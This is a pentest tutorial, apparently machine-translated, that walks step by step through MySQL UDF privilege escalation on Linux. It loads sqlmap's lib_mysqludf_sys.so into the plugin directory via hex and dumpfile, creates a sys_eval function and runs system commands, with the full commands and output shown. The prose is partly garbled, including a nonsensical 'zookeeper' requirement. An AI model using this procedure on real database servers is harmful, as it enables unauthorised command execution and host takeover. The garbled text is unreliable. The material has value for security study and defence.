Privilege Escalation for Linux UDF Mysql

Environment: OS: linux (bt5) database: mysql Description: execute any program using a user-defined library function. The test is passed only in linux. For details, see windows, the dll used is naturally different. Requirement: the mysql database must have a func table, and the UDF will be disabled when zookeeper skip allow grant revoke tables is enabled. Procedure: obtain the path of the plug-in library, find the udf library file of the corresponding operating system, load the function using the udf library file, and execute command 1 to obtain the path of the plug-in library.

mysql> show variables like "%plugin%";+---------------+-----------------------+| Variable_name | Value                 |+---------------+-----------------------+| plugin_dir    | /usr/lib/mysql/plugin |+---------------+-----------------------+1 row in set (0.00 sec)

 

2. Find the udf library file of the corresponding operating system and check the version of the udf library by yourself. The 64-bit root @ bt :~ # Uname-aLinux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 for udf files in GNU/Linux, you only need to find the version of the corresponding operating system in sqlmap.

root@bt:/pentest/database/sqlmap/udf/mysql# lslinux  windowsroot@bt:/pentest/database/sqlmap/udf/mysql/linux# ls32  64root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# lslib_mysqludf_sys.so

 

3. Use the udf library file to load the function and execute the command. First, you must obtain the hexadecimal format of the udf library file, you can locally use mysql> select hex (load_file ('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so') into outfile '/tmp/udf.txt '; query OK, 1 row affected (0.04 sec) because I used my own account and account name mysql during the test, it is not root, so the plug-in directory cannot be written, but in reality, generally, udf Elevation of Privilege is a mysql program started with the root permission. Therefore, there is no situation where the directory permission is insufficient and cannot be accessed. To continue, modify the directory permission root @ bt :~ # Write the udf Library to the mysql database directory in chmod 777/usr/lib/mysql/plugin Database: mysql> select unhex ('7f454c46020... ') into dumpfile'/usr/lib/mysql/plugin/mysqludf. so '; Query OK, 1 row affected (0.04 sec) view the functions supported by this udf Library

root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so                 w _Jv_RegisterClasses0000000000201788 A __bss_start                 w __cxa_finalize                 w __gmon_start__0000000000201788 A _edata0000000000201798 A _end0000000000001178 T _fini0000000000000ba0 T _init                 U fgets                 U fork                 U free                 U getenv000000000000101a T lib_mysqludf_sys_info0000000000000da4 T lib_mysqludf_sys_info_deinit0000000000001047 T lib_mysqludf_sys_info_init                 U malloc                 U mmap                 U pclose                 U popen                 U realloc                 U setenv                 U strcpy                 U strncpy0000000000000dac T sys_bineval0000000000000dab T sys_bineval_deinit0000000000000da8 T sys_bineval_init0000000000000e46 T sys_eval0000000000000da7 T sys_eval_deinit0000000000000f2e T sys_eval_init0000000000001066 T sys_exec0000000000000da6 T sys_exec_deinit0000000000000f57 T sys_exec_init00000000000010f7 T sys_get0000000000000da5 T sys_get_deinit0000000000000fea T sys_get_init000000000000107a T sys_set00000000000010e8 T sys_set_deinit0000000000000f80 T sys_set_init                 U sysconf                 U system                 U waitpid

 

Finally, load the function and execute:

mysql> create function sys_eval returns string soname "mysqludf.so";Query OK, 0 rows affected (0.14 sec)mysql> select sys_eval('whoami');+--------------------+| sys_eval('whoami') |+--------------------+| mysql              |+--------------------+1 row in set (0.04 sec)mysql> select * from mysql.func;+----------+-----+-------------+----------+| name     | ret | dl          | type     |+----------+-----+-------------+----------+| sys_eval |   0 | mysqludf.so | function |+----------+-----+-------------+----------+1 row in set